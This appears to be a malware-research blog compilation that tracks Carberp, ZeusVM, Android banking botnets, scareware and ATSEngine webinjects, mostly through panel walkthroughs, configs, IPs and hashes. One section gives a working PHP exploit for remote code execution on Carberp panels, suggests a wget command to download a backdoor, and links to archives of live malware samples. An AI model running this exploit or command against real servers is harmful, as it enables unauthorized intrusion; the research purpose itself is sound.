Sample: 917df7b6268ba705b192b89a1cf28764
Version: 1.1.3.4
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
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Points:
https://koloboktv.com/?ajax (static config)
https://securestakan2.net/?ajax (dynamic config)
https://securemagnit5.net/?ajax (dynamic config)
WebInjects:
https://pikachujp.com/oz1/service.in?id=50
https://pikachujp.com/oz1/service.in?id=44
https://pikachujp.com/oz1/service.in?id=43
https://pikachujp.com/oz1/service.in?id=41
https://pikachujp.com/oz1/service.in?id=7
https://pikachujp.com/oz1/service.in?id=6
https://pikachujp.com/oz1/service.in?id=4
https://pikachujp.com/oz1/service.in?id=3
https://pikachujp.com/oz1/service.in?id=2
https://pikachujp.com/oz1/service.in?id=1
https://koloboktv.com/id/351
https://koloboktv.com/id/350
https://koloboktv.com/id/51
https://koloboktv.com/id/10

Sample: 7fb62987f20b002475cb1499eb86a1f5
Version: 1.1.2.1
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
Update Point:
https://securestatic.com/?ajax (static config)

All these samples use the same IP range:
• dns: 1 ›› ip: 37.228.92.170 - adress: SECURE730.COM
• dns: 1 ›› ip: 37.228.92.169 - adress: SECUREINFORMAT.COM
• dns: 1 ›› ip: 37.228.92.148 - adress: SHLYXIEST.BIZ
• dns: 1 ›› ip: 37.228.92.147 - adress: SECURESTATIC.COM
• dns: 1 ›› ip: 37.228.92.146 - adress: KOLOBOKTV.COM

I've written a small yara rule in the hope of seeing more of these.
All the configs I grabbed were reporting to localhost, not to a server...

Carberp C&C

And here we go, the first Carberp panel I've broken from the leak; surely a test one, the gateway was badly configured, like the domains.

Login:
To view the login page you sometimes need a special key like:
/login/?x=11111111111111111111111111111111

It was not required on this server, but if you want an example let's try on another Carberp C&C.
Without:
With:

Dashboard, License Information:

Statistics:

Bots:

Diagram:

Search:

P2P:

Host:

Tasks:

Add a task:

Links:

Logs:

Filters:

Cab-files:

iBank:

Keylogger:

Add program:

Recycle bin:

AutoSystem:

Add domains:

Builds:

Add builds:

Settings:

Users:

User settings:

User permissions:

Edit user:

User information:

About my previous post, fun fact: in 2011 I had already found traces of logs in a C&C, and Mystic Compressor was used on the sample.
(14:44:15) Павел: we need to add to the admin panel
1. view all the logs for a single bot!
(14:44:27) Павел: show all the RU bots that are online, only those! and the logs for them
(14:44:30) Павел: so we can see whether there are bugs etc.
(14:45:40) aksoft@188.72.206.204/work: show all the RU bots that are online, only those! and the logs for them - clarify that
(14:45:57) Павел: well, so that it filters the output
(14:46:14) Павел: finds all the bots that have a line like this in their logs:
isOfflineVersion = false isOnlineVersion = true
(14:46:18) Павел: language = RUS
(14:46:30) Павел: and after that shows the logs for all of them, only those! outputs the log
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=747

Carberp Remote Code Execution: Carpwned

Everyone is looking at the Carberp source, bootkit and other components, but did anyone investigate the panel's source?
I don't know who did the PHP but he deserves a medal; it's easier to hack than SpyEye. (yeah, I didn't think it was possible either)

Here I'll talk about a simple code injection, but there are a lot of other vulnerabilities in these leaked panels.
e.g.: stupid code that allows IP spoofing:

No but seriously, the best vulnerability is the RCE one; the guy who coded this is really mentally retarded:
look at this eval(), look!

Oh, good timing, some Carberp C&Cs appeared on vx.vault:

Let's write a spl0it now; I think most of you came here for a PoC, right?
Carberp RCE
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<label for="urlz">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if (isset($_POST['urlz']))
{
    if (!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
    {
        echo "<font color='red'>URL is not valid</font>";
    }
    else
    {
        // 'data' carries the serialized payload the panel hands to eval(); the string is elided in the post
        $data = array(
            'id'   => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
            'data' => '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');
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
        curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        $contents = curl_exec($ch);
        curl_close($ch);
        // the payload's output is expected to contain a '-'; anything else is treated as not vulnerable
        if (preg_match("#-#", $contents))
        { echo "<pre>" . $contents . "</pre>"; }
        else
        { echo "<font color='red'>Not vulnerable :(</font>"; }
    }
}
?></td>
</tr>
</table>

The 'encoded' part does a file_get_contents() on includes/config.php,
then connects to the SQL DB and shows the Carberp credentials (in case we don't have phpMyAdmin).
But it would be useless if we can't show the login page because of the auth key, so it parses index.php and retrieves it.
Cool payload, huh?
Let's test it then...

37.221.165.123:

91.214.202.117:

I've tested on some other C&Cs and everything went fine.
And it's an RCE, so you can execute some cool shit like system('wget http://xxx.xxx');
to download a backdoor or whatever...

Here are some screenshots of the panel:

Bots:

Diagram all:

Diagram live:

Diagram OS:

Diagram AV:

Diagram Rights:
Wait... a 'diagram'?!

Tasks:

Logs:

Passwd:

AutoSystem:

Settings:
oh really, who's fucked now ?

ZeusVM and steganography

Months ago, researchers observed an evolution of ZeusVM; time to get back to this family.

For information,
the first ZeusVM sample I saw using steganography was on 21 November 2013.
The IP of the C&C is of Russian origin: 212.44.64.202
A Sutra TDS redirecting to the Nuclear Exploit pack was pushing the payload; Roman of abuse.ch blacklisted 212.44.64.202 one month later on his Zeus tracker.

The first guy who publicly wrote about the ZeusVM change is probably Jerome Segura of Malwarebytes.
Actually the latest version I've seen in the wild is 1.0.0.5, and if you want a hash: e4c31d18b92ad6e19cb67be2e38c3bd1 (the sample is fresh from today)

Let's have a look now at the first server I saw... 212.44.64.202.
Pony, Multilocker, mailers, Grum and an older version of ZeusVM (without steganography) were also hosted on this server, but that's not the topic.

The filenames of the login scripts and ZeusVM configs were written in transliterated Russian, like:
borodinskoesrajenie.jpg (http://en.wikipedia.org/wiki/Battle_of_Borodino)
vhodtolkodlyaelfov.php (only elves can enter)
logovoelfov.php (elf's den)
domawniypitomec.php (domestic animal)
jivotnoe.php (animal)
larecotkryt.php (the chest is open)
And so on... overall the panel design seems to be back to the original Zeus style (unlike the previous 'generation' of ZeusVM with casper)

/kec/:

/luck/:

/ass/:

/kbot/:

/ksks/:

/one/:

/two/ (unused):

/three/ (unused):

/four/ (unused):

Now, to decode those ZeusVM images, as described by Jerome, you just need to strip the image and do the following: Base64 + RC4 + VisualDecrypt + UCL decompress
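The decoding chain above, as an added example (my own code, not the post author's tool and not code from any ZeusVM sample): it pulls the appended blob out of the image, base64-decodes it, runs RC4, undoes Zeus's VisualEncrypt and feeds the result to a port of UCL's NRV2B decompressor. Two things here are assumptions rather than facts from the post: that the encoded blob sits after the JPEG end-of-image marker (FF D9), and the RC4 key, which in reality comes from the bot binary; the sample "image" and the hand-assembled NRV2B stream are constructed for the example.

```python
import base64

# Constructed key for the example; a real bot carries its own RC4 key in the binary.
RC4_KEY = b"constructed-test-key"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def visual_decrypt(data: bytes) -> bytes:
    """Zeus VisualDecrypt: XOR each byte with the previous (still encrypted) byte, last to first."""
    buf = bytearray(data)
    for i in range(len(buf) - 1, 0, -1):
        buf[i] ^= buf[i - 1]
    return bytes(buf)


def visual_encrypt(data: bytes) -> bytes:
    """Inverse of visual_decrypt; only used here to build the constructed sample."""
    buf = bytearray(data)
    for i in range(1, len(buf)):
        buf[i] ^= buf[i - 1]
    return bytes(buf)


def nrv2b_decompress(src: bytes) -> bytes:
    """Port of UCL's nrv2b_decompress_8: flag bits MSB-first, literals/offsets as raw bytes."""
    dst = bytearray()
    ilen = 0
    bb = 0              # bit buffer; bit 0 set acts as the sentinel for 'byte exhausted'
    last_m_off = 1

    def getbit() -> int:
        nonlocal bb, ilen
        if bb & 0x7F:
            bb *= 2
        else:                       # 8 bits consumed: fetch the next flag byte
            bb = src[ilen] * 2 + 1
            ilen += 1
        return (bb >> 8) & 1

    while True:
        while getbit():             # flag 1: copy one literal byte
            dst.append(src[ilen])
            ilen += 1
        m_off = 1                   # gamma-coded match offset
        while True:
            m_off = m_off * 2 + getbit()
            if getbit():
                break
        if m_off == 2:
            m_off = last_m_off      # repeat previous offset
        else:
            m_off = (m_off - 3) * 256 + src[ilen]
            ilen += 1
            if m_off == 0xFFFFFFFF:  # end-of-stream marker
                break
            m_off += 1
            last_m_off = m_off
        m_len = getbit() * 2 + getbit()
        if m_len == 0:              # long match length, gamma-coded
            m_len = 1
            while True:
                m_len = m_len * 2 + getbit()
                if getbit():
                    break
            m_len += 2
        if m_off > 0xD00:
            m_len += 1
        pos = len(dst) - m_off      # byte-by-byte copy handles overlapping matches
        for _ in range(m_len + 1):
            dst.append(dst[pos])
            pos += 1
    return bytes(dst)


def extract_appended_payload(image: bytes) -> bytes:
    """Assumption: the base64 blob is appended after the last JPEG EOI marker (FF D9)."""
    idx = image.rfind(b"\xff\xd9")
    if idx < 0:
        raise ValueError("no JPEG EOI marker found")
    return image[idx + 2:]


def decode_zeusvm_image(image: bytes, key: bytes) -> bytes:
    """Base64 -> RC4 -> VisualDecrypt -> UCL (NRV2B) decompress, as described in the post."""
    raw = base64.b64decode(extract_appended_payload(image))
    return nrv2b_decompress(visual_decrypt(rc4(key, raw)))


# Constructed NRV2B stream: literals 'A','B','C', a match (offset 3, length 3),
# then the end-of-stream marker. Hand-assembled for this example; decodes to b"ABCABC".
SAMPLE_COMPRESSED = bytes([0xEE, 0x41, 0x42, 0x43, 0x02,
                           0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x80, 0xFF])


def build_sample_image(key: bytes = RC4_KEY) -> bytes:
    """Fake 'image' (constructed): minimal JPEG framing plus the encoded sample config."""
    fake_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
    return fake_jpeg + base64.b64encode(rc4(key, visual_encrypt(SAMPLE_COMPRESSED)))


if __name__ == "__main__":
    print(decode_zeusvm_image(build_sample_image(), RC4_KEY))
```

Against a real image you would replace the constructed key with the one recovered from the sample and keep the rest; if the output is not a plausible config, the first thing to check is the assumption about where the blob starts, not the RC4 or UCL code.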

Here are some 'malicious' images from 212.44.64.202:
mix.jpg:
mix.jpg:
mix.jpg:
mix.jpg:
config.jpg:
kartamestnosti.jpg:
webi_test.jpg:
uwliottrekera.jpg:
test_vnc2.jpg:
x64hook.jpg:

Some configs were done for tests:

And some weren't for tests, targeting banks with MiTB.
Malicious code injection, on a ZeusVM botnet targeting France:

Lame webinject:


CCGRAB:
ATSEngine:

Nowadays more actors are starting to use ZeusVM, like the group who was using the 'private' version of Citadel 3.1.0.0 and the group who was targeting Japan.
Both switched to ZeusVM as an alternative to Citadel.

You can find the samples related to 212.44.64.202, with configs and decoded, here:
http://temari.fr/vx/ZeusVMs_212.44.64.202.7z

Some other ZeusVM samples (not related to 212.44.64.202):
http://temari.fr/vx/ZeusVMs_v1.0.0.2_v1.0.0.5.7z

root/root

Android/FakeToken.A

OTP forwarder dumped months ago.

Login:

Statistics:

Bots:

Bot:

Passwords:

Send a command:

Commands sent:

Apps:

Apps builder:

MD5s:
2d4770137ae0b91446fc2f99d9fdb2b0
f629adcfbcdd4622ad75337ec0b1a0ff
dd4ac55df6500352dd2cad340a36a40f
b9f9614775a54aa42f94eedbc4796446
1fababfd02ea09ae924cd0a7dbfb708c
bc8394bc9c6adbcfca3d450ee4ede44a
1cb87e1716c503bf499e529ee90e5b31
6db5cdd2648fcd445481cdfa2f2b065a
2ad6f8b8e4aaf88b024e1ddb99833b79
8bac185b6aff0bec4686b7f4cb1659c8

App settings:

Settings:

Second panel, a bit different, looks like a 'test' one.
Statistics:

Phone:

Phone search:

Settings:

RSA Security also talked about it here

Lame scareware

I found a sample yesterday, downloaded via this url: skyways.co/play.exe, a console application with ugly code, plus a scareware and a third-party FakeAV call center.
All of the following was so lame that I need to talk about it.


At first the malware will check whether it has been dropped into %SYSTEMROOT%/system/
If that's not the case then it will create a file:

Then, you would think it will write into the newly created file, but nope, it adds registry persistence by using the API CreateProcess (oh god, why) instead of RegCreateKey:

Finally writes the file:

Waits 5 minutes, then displays a message box:
"Your computer's file system has encountered a serious error. Please restart the computer or call support at 1-866-286-6162"

After a reboot, a shutdown procedure is initiated:


And 5 minutes later, once again the message box:


I searched the phone number on Google and found this:
"Technicion is an independent provider of on-demand tech support and not affiliated with any third party"

ok, what about the payment page:
Just 99.99 without any explanation, even the currency symbol is unknown, what a serious site.

And for the story I tried to call 1-866-286-6162 to insult them and tell them how much I hate their ugly code etc.. but there were no available representatives..

Android.Trojan.Rubobi.A (SmsPiratBot)

Another Android botnet dumped recently.
This malware can send and intercept SMS from bots.
Like most Android botnets, they are mainly used to target mobile banking such as Sberbank (www.sberbank.ru, the biggest bank in Russia)
In Russia, you can transfer money from one card to another through mobile SMS
This botnet is sold for $120

Fake App:
MD5: 2ea5e73653d1454c04ecd48202dcc391

Login:

System Stats:

Countries:

Operators:

Task Stats:

Task Editor:

Blacklist:

Stored SMS:

Another panel:

Structure:

ATSEngine

ATSEngine injects can often be found inside Zeus configs; they make the webinjects more dynamic because most of the content is located remotely and can be updated much more easily, instead of sending a new config to all the bots.
That's the main difference between this and a standard web inject inside Zeus.
One just allows you to make a static change in the page, while the other gives you many more options, for example customized webinjects, pop-ups, online requests for tokens, etc...
ATSEngine also has a Jabber alert feature: it lets the fraudster know when the victim is logged into his bank account, so that would be a good time to backconnect to him (with the VNC feature of Zeus) and do the transaction.
Most ATSEngine panels are also hosted on SSL because banks use SSL.

ATSEngine in a ZeusVM config.

ATSEngine in a Citadel config.
Example of figrabber.js from an ATSEngine panel.

Some guys also run a business around this type of web inject, for example:
He's offering a service for writing injects.
The title says "Auto-uploads and Injects from professionals for professionals"
The rest of the text explains how the service works; it's more a terms and conditions post than a technical description of the product, about moneyback, privacy, guarantees and other stuff.
They don't write mobile botnets, trojan horses, traffic direction systems or other malware except injects, and they don't guarantee bypass of protections (like Rapport).
yummba is known anyway for writing injects for ATSEngine.

Let's have a look at a C&C now..


Accounts:

Reports:

Options main:

Options Jabber:

Another panel, on SSL:

Another panel, on SSL:

Another panel, still on SSL:

Details:

Additional fields rules:

Additional fields rules (texts):

Edit rule:

Edit text:

VBV/MCSC rules:

Add a rule:

Options:

Options (CC Checker):

Files, dumped from another panel, targeting La Banque Postale (a French bank):

Install service for Malware affiliates and individuals

This install service had been running for a long time, but the server recently died.
The people targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.

Login:

Statistics by days:
(Date, Unique visits, General visits)

Statistics by countries:
(Countries, Unique visits, Percentage, General visits)

Statistics by version:
(Version, Unique visits, Percentage, General visits)

Statistics by time:
(Time,  Users)

Downloads:
(Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)

Updates:
(Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)

Statistics by tasks:
(Date, Start of xxxx, Searches, Clicks, ???)

Statistics by sites:

Statistics by ads:

Loader, users list:
(Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)

There are some interesting people in this listing:
Severa (known for FakeAV, spam)
Malwox affiliate (Mayachok.1)
Feodal Cash affiliate (Bitcoin malware)

And if you want to know about the EXE files loaded... all are malware (Zeus, SpyEye, Russian lockers, spam bots, Mayachok... etc..)
The x64 Zbot covered by Kaspersky also came from here.

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1363&start=50#p19625
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=648&start=40#p19621
The executables were rotated and refreshed constantly; from this system, around 400 samples could be pulled per day.

Download statistics for client 191 ( Malwox TEST ):
(Date,  Derved, Executed, Ctr, Create, Exists, Down, Run, Unp)

Edit user:

Add user:

Schedule for user:

FTP:
Menu: users list, add, FTP, Stats.

For the FTP list, most of the accounts had a shell on them.

Structure:

From the source:
$useZorkaJob=0; // without a visit
$useSputnikJob=0;
$useRekloJob=0;
$useSpoiskJob=0;
$useBegunCheatJob=0;
Begun is one of the biggest ad services in Russia.

i/o

Wow, it's been a while since I've written anything new here...
So to answer many questions.. no, I'm not dead, and I will try to get a bit more active again next year.

I'm not writing this due to explanation requests or worried people (even if I got solicited many times to write something) but more because I'm motivated again to write.
As I've said many times in reply to the recurrent e-mails I receive and continue to receive (even after 7 months of inactivity!)
I've made a lot of changes in my life, and during this time I had better things to do than writing a blog.
Principally I had many personal issues to resolve.
It's also not the first time I repeat that I have a life and that I've always run this blog for fun and nonprofit, like my other services such as cybercrime-tracker.net
And sooner or later I get bored and take a break, although I've continued to update CCT, so as not to leave people with nothing.


I also changed job and shifted to the energy sector.
I wanted a job that combines my passion for mechanics and electronics.
And now I'm winding turbo-alternators for nuclear/hydraulic power plants around the world and governmental organisations. (pretty cool, huh?)
I can't tell you details obviously due to confidentiality clauses as it's critical, but making those huge machines/projects is quite awesome and the job is very meticulous.

I've also joined the administration of my local hackerspace, and now hold the position of treasurer.
I'm also doing various workshops, mostly electronics/borderline related, which take me time to prepare and organize.
In parallel I also experiment a lot myself; those who follow my YouTube/Twitter activity probably know what I mean, I received hydrofluoric acid 2 days ago.

2014 started a bit badly for me as I had a car crash on Christmas day and broke my clavicle. Anyway, globally it was a nice year, and off my blog I've met a lot of people like Horgh and many others.
Sadly I wasn't able to go to BotConf nor DahuCon this year due to my job... so maybe next year!

I've also worked a bit with Hackerstrip and recently released some code for DarK-CodeZ #6, nothing fancy but it was fun to participate, thanks guys.
So that's all, see you in 2015 for throwing cobblestones and breaking bones!

iBanking

iBanking is an Android malware made to intercept voice and text information.
The panel is poorly coded.

Login:

Projects:

Phone list:

SMS List:

All SMS (Incoming):

All SMS (Outgoing):

Call list (Incoming):

Call list (Outgoing):

Call list (Missed):

Sounds:

Contact list:

Url report: